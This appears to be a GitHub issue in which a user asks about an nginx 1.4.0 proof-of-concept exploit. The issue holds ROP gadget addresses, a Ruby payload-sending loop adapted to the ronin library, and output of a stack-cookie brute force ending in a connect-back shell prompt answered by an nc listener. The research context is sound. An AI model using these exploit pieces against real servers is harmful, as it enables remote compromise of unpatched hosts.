nginx-1.4.0
nginx-1.4.0 copied to clipboard
danghvu
Questions on the provided exploit script
Hello, first of all, thank you very much for releasing this PoC for researchers to try and learn how the exploit works.
I have been trying to get this exploit working for the latest version of ronin, but I just wanted to get a few clarifications as I'm trying to update the script to see whether I can get it working.
Inside of script, there is these information needed:
# rop address taken from nginx binary (find in the repo)
poprdi = 0x00427006
poprsi = 0x0043a00e
poprdx = 0x0041b8fa
poprax = 0x00442c80
mmap64 = 0x4029b0
mmapgot = 0x67f290
mmapaddr = 0x00410000
rsito_rax_ = 0x0042afcb
add_rdi_al = 0x00462de4
So first six are relatively simple for my own built binary to find using objdump and ROPgadget as follows:
poprdi = 0x495f7 # [+] Gadget found: 0x495f7 pop rdi ; ret
poprsi = 0x4cf1b # [+] Gadget found: 0x4cf1b pop rsi ; ret
poprdx = 0x17f013 # [+] Gadget found: 0x17f013 pop rdx ; ret
poprax = 0xdd823 # [+] Gadget found: 0xdd823 pop rax ; ret
mmap64 = 0x48110 # (From objdump) 0000000000048110 <mmap64@plt>:
mmapgot = 0x2ad088 # 48110: ff 25 72 4f 26 00 jmpq *0x264f72(%rip) # 2ad088 <mmap64@GLIBC_2.2.5>
So now my question is, what is mmapaddr variable for? I tried objdump, the provided nginx executable in the repository, but could not find anything at the address 0x410000.
Furthermore, just to verify, are these two variables represent the following assembly codes?
rsito_rax_ = # 4b08d: 48 89 f0 mov %rsi,%rax
add_rdi_al = # add %rdi,%al
I found something that looks like rsito_rax, but I could not find anything for add_rdi_al, so I'm guessing the assembly instruction for this one.
Lastly, in crash function, I noticed that the code is written as
5.times do
tcp_session(ARGV[0],ARGV[1].to_i) do |s|
$count += 1
s.send(payload, 0)
data = s.recv(10)
end
return true if data.strip.empty?
end
I have realized that tcp_session is deprecated for the latest version ronin. Therefore, I attempted to update this using tcp_connect so it would look something like this:
5.times do
tcp_connect(ARGV[0],ARGV[1].to_i) do |s|
$count += 1
s.send(payload, 0)
data = s.recv(10)
end
return true if data.strip.empty?
end
Would this be correct?
When I try to execute the exploit with my updated changes above, it looks something like this:
~/Downloads/nginx-1.4.0 (master*) » ruby exp-nginx.rb 127.0.0.1 8080 1 ↵ jaewon@mir3
[*] searching for byte: 1
1
[*] searching for byte: 2
1
[*] searching for byte: 3
1
[*] searching for byte: 4
1
[*] searching for byte: 5
1
[*] searching for byte: 6
1
[*] searching for byte: 7
1
[*] Found cookie: \x00\x01\x01\x01\x01\x01\x01\x01 8
[*] PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT 0.0.0.0 4000
[*] 36 connections
And I cannot get anything after running nc -lvvv 4000 , which means I probably am doing something wrong in my script.
Thank you in advance for any suggestions!
